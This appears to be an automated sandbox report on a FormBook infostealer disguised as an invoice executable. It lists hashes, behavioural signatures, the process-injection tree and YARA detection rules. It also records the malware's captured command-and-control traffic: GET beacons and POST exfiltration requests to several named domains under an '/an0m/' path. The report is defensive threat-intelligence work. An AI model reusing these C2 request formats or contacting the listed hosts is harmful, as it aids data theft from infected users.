
Analysis Report Invoice_CAII00008052.exe

Overview

General Information

Sample Name: Invoice_CAII00008052.exe
MD5: 2178b027d2a8569ae99bd44a95098752
SHA1: 028e676861237538ca07c9c5af22f00f75ffa842
SHA256: bbeaa9844707d05be207be543f9adaf70878e8e7d36eae9fe73fc8e9b92b3a72

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Startup

  • System is w10x64
  • Invoice_CAII00008052.exe (PID: 5564 cmdline: 'C:\Users\user\Desktop\Invoice_CAII00008052.exe' MD5: 2178B027D2A8569AE99BD44A95098752)
    • Invoice_CAII00008052.exe (PID: 5688 cmdline: 'C:\Users\user\Desktop\Invoice_CAII00008052.exe' MD5: 2178B027D2A8569AE99BD44A95098752)
      • explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • autofmt.exe (PID: 5984 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 799DAC47499E80129D45A4818CF75657)
        • autochk.exe (PID: 5992 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 67DFCAFAAD1B556C7731CDFDD4F4B803)
        • WWAHost.exe (PID: 6024 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: C9270A9CEE330E944B6CA1212D6B77DA)
          • cmd.exe (PID: 6052 cmdline: /c del 'C:\Users\user\Desktop\Invoice_CAII00008052.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16289:$sqlite3step: 68 34 1C 7B E1
  • 0x1639c:$sqlite3step: 68 34 1C 7B E1
  • 0x162b8:$sqlite3text: 68 38 2A 90 C5
  • 0x163dd:$sqlite3text: 68 38 2A 90 C5
  • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8358:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x86f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14385:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13e71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14487:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x145ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x927a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x130ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ff2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16289:$sqlite3step: 68 34 1C 7B E1
  • 0x1639c:$sqlite3step: 68 34 1C 7B E1
  • 0x162b8:$sqlite3text: 68 38 2A 90 C5
  • 0x163dd:$sqlite3text: 68 38 2A 90 C5
  • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
(list truncated: 19 entries in total)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Invoice_CAII00008052.exe.27f0000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Invoice_CAII00008052.exe.27f0000.3.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15489:$sqlite3step: 68 34 1C 7B E1
  • 0x1559c:$sqlite3step: 68 34 1C 7B E1
  • 0x154b8:$sqlite3text: 68 38 2A 90 C5
  • 0x155dd:$sqlite3text: 68 38 2A 90 C5
  • 0x154cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x155f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Invoice_CAII00008052.exe.27f0000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7558:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x78f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13585:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13071:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13687:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x137ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x847a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x122ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x91f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x17b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x18bea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16289:$sqlite3step: 68 34 1C 7B E1
  • 0x1639c:$sqlite3step: 68 34 1C 7B E1
  • 0x162b8:$sqlite3text: 68 38 2A 90 C5
  • 0x163dd:$sqlite3text: 68 38 2A 90 C5
  • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
(list truncated: 19 entries in total)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Yara detected FormBook
Source: Yara match | File source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Invoice_CAII00008052.exe | Joe Sandbox ML: detected
Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 0_2_00409044 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime | 0_2_00409044
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 0_2_00405A68 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn | 0_2_00405A68
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 8_2_02D9F760 FindFirstFileW,FindNextFileW,FindClose | 8_2_02D9F760
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 8_2_02D9F759 FindFirstFileW,FindNextFileW,FindClose | 8_2_02D9F759

Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then push 00491B28h | 0_2_00491A08
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then call 00406A90h | 0_2_00491B7C
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then push 004A0DDCh | 0_2_00491B7C
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then pop edi | 2_2_0040C1B6
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then pop edi | 2_2_0040C20F
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then pop edi | 2_1_0040C1B6
Source: C:\Users\user\Desktop\Invoice_CAII00008052.exe | Code function: 4x nop then pop edi | 2_1_0040C20F
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop edi | 8_2_02D9C20F
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop edi | 8_2_02D9C1B6

Source: global traffic | HTTP traffic detected: GET /an0m/?abN8C=Y8StOgjTBUc2RVi6CYGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwjT9KknvY5b&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1 | Host: www.yr-ct.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=w0B5E3Tvv+w/kd6Kt5bRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAuh1jmwBHT3 HTTP/1.1 | Host: www.magentos.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=ItsweDGFEIfkN8iGMiT/CcI9tOGzcRma3szN3awFj2f289L7MYRfsokf4asOwmhwfWcg HTTP/1.1 | Host: www.aj-buckley.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /an0m/?abN8C=kOFDBNZQA2sT84b4nGvJlEsnJlkbfDKocHJFzldP3EC4MwSwQZ17LsPPvOWyctfqTmcO&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1 | Host: www.mommietalk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 160.153.136.3 160.153.136.3
Source: Joe Sandbox View | IP Address: 160.153.136.3 160.153.136.3
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Joe Sandbox View | ASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6a 33 52 49 35 4b 46 6f 6d 49 55 57 50 30 43 64 71 41 4c 49 67 52 4b 35 6b 2d 31 30 28 55 4a 50 43 70 6b 68 31 41 78 5a 79 66 70 30 78 30 6b 64 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 72 69 35 6a 72 52 47 36 36 44 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMj3RI5KFomIUWP0CdqALIgRK5k-10(UJPCpkh1AxZyfp0x0kd2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6ri5jrRG66Dndjt-Cg).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.aj-buckley.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.aj-buckley.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aj-buckley.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 48 76 59 4b 41 6d 7e 46 4e 59 7e 45 4d 74 28 41 52 57 53 76 65 72 6c 48 37 37 79 7a 58 41 28 51 73 61 53 46 6a 4d 45 79 68 55 54 4d 35 4e 62 69 4c 49 64 4e 6d 5a 64 78 34 6f 73 4e 34 31 63 67 58 57 63 34 50 54 68 7a 53 75 35 4b 72 76 41 6a 46 37 62 39 28 54 45 42 74 46 6a 73 6c 42 39 49 54 68 49 72 61 68 71 2d 67 2d 46 35 46 6f 6e 67 42 45 49 2d 4a 6b 49 38 79 55 54 63 54 63 6e 49 47 44 7e 41 36 38 34 4d 65 52 69 79 36 42 42 56 78 58 62 62 31 61 74 7a 67 63 4f 63 36 4f 76 63 48 4e 69 64 6f 73 48 4c 70 59 57 4f 63 69 75 7a 76 4c 4f 51 36 41 34 72 4d 6a 30 42 32 64 5a 4e 65 31 74 74 56 36 45 62 64 77 59 70 32 39 42 65 31 42 76 45 39 6d 77 31 46 42 61 55 76 71 62 64 6b 5f 47 66 6d 4e 66 4c 69 4e 41 46 48 38 6b 66 36 6d 5a 32 37 69 44 35 37 4f 6c 57 73 6f 36 36 35 4f 51 4e 51 66 4f 38 4a 6a 6e 75 53 61 68 69 7e 76 73 4b 63 6a 67 58 6f 49 34 6b 79 68 4f 2d 50 32 66 43 39 42 72 72 48 63 38 4a 33 6d 43 72 46 71 74 54 6f 48 66 45 78 44 69 74 6b 31 4d 66 47 69 59 30 39 32 39 32 64 4c 53 36 32 75 35 4c 6b 35 56 74 69 2d 6e 79 75 52 37 6a 55 6b 56 6c 67 5f 7a 37 6f 6d 4a 57 55 7a 43 41 68 54 75 77 6c 35 46 4e 54 4f 69 76 34 76 6a 56 76 4e 64 6c 79 30 6b 39 6b 6a 38 75 4a 46 75 5a 5a 64 66 74 66 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=HvYKAm~FNY~EMt(ARWSverlH77yzXA(QsaSFjMEyhUTM5NbiLIdNmZdx4osN41cgXWc4PThzSu5KrvAjF7b9(TEBtFjslB9IThIrahq-g-F5FongBEI-JkI8yUTcTcnIGD~A684MeRiy6BBVxXbb1atzgcOc6OvcHNidosHLpYWOciuzvLOQ6A4rMj0B2dZNe1ttV6EbdwYp29Be1BvE9mw1FBaUvqbdk_GfmNfLiNAFH8kf6mZ27iD57OlWso665OQNQfO8JjnuSahi~vsKcjgXoI4kyhO-P2fC9BrrHc8J3mCrFqtToHfExDitk1MfGiY09292dLS62u5Lk5Vti-nyuR7jUkVlg_z7omJWUzCAhTuwl5FNTOiv4vjVvNdly0k9kj8uJFuZZdftfA).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.mommietalk.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.mommietalk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mommietalk.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 72 4d 78 35 66 70 51 45 63 68 74 79 38 49 79 6c 35 77 7e 70 6c 51 6c 47 48 33 31 4e 66 79 69 58 49 41 49 6a 6d 58 42 62 79 31 47 50 4f 6a 4b 37 66 38 67 57 4e 38 4b 57 31 39 7e 6c 5a 5f 4f 38 57 43 6c 54 51 67 33 48 47 69 7e 62 68 65 38 45 57 76 41 44 4f 50 37 7a 77 34 63 36 4b 4b 50 67 30 53 42 45 61 46 6b 69 51 59 64 6a 58 4d 74 50 4d 4b 6c 54 32 33 62 41 48 4a 4f 78 6a 35 72 32 42 6a 57 5a 73 56 41 72 58 76 52 47 48 31 54 69 5a 31 28 66 28 54 72 42 78 68 43 6b 6e 69 4c 62 6f 41 7e 59 45 62 35 30 34 39 32 34 54 4a 48 44 4f 33 65 4f 34 63 69 67 44 43 68 5a 35 43 44 45 30 51 34 76 37 35 34 56 50 32 36 62 51 6b 71 6a 57 4a 7a 6b 61 55 75 38 41 4d 78 50 66 36 54 59 79 69 44 45 6c 42 4d 64 48 48 6f 49 6f 4b 33 30 57 32 75 4c 6e 4c 38 58 7e 76 38 78 64 63 33 58 7e 45 75 4a 61 55 48 36 32 6c 30 4e 4f 39 70 4b 51 31 75 30 57 38 4b 73 46 6e 54 55 66 57 78 52 7a 2d 35 52 7a 6b 57 31 76 36 43 39 56 33 4e 45 71 4b 4b 48 6d 76 34 78 37 35 68 58 56 4e 45 43 6b 4e 77 4c 30 31 51 30 35 4a 4b 4a 68 53 50 34 61 45 59 55 46 73 28 70 68 59 35 6a 71 65 4c 54 56 6b 79 39 66 44 42 46 4f 67 6d 73 71 52 31 37 63 5a 61 57 6c 2d 61 78 42 47 71 6b 6c 6c 6f 5a 44 69 4f 4f 30 6c 54 5f 72 4e 4c 2d 30 4a 76 5f 4f 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=rMx5fpQEchty8Iyl5w~plQlGH31NfyiXIAIjmXBby1GPOjK7f8gWN8KW19~lZ_O8WClTQg3HGi~bhe8EWvADOP7zw4c6KKPg0SBEaFkiQYdjXMtPMKlT23bAHJOxj5r2BjWZsVArXvRGH1TiZ1(f(TrBxhCkniLboA~YEb504924TJHDO3eO4cigDChZ5CDE0Q4v754VP26bQkqjWJzkaUu8AMxPf6TYyiDElBMdHHoIoK30W2uLnL8X~v8xdc3X~EuJaUH62l0NO9pKQ1u0W8KsFnTUfWxRz-5RzkW1v6C9V3NEqKKHmv4x75hXVNECkNwL01Q05JKJhSP4aEYUFs(phY5jqeLTVky9fDBFOgmsqR17cZaWl-axBGqklloZDiOO0lT_rNL-0Jv_Og).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
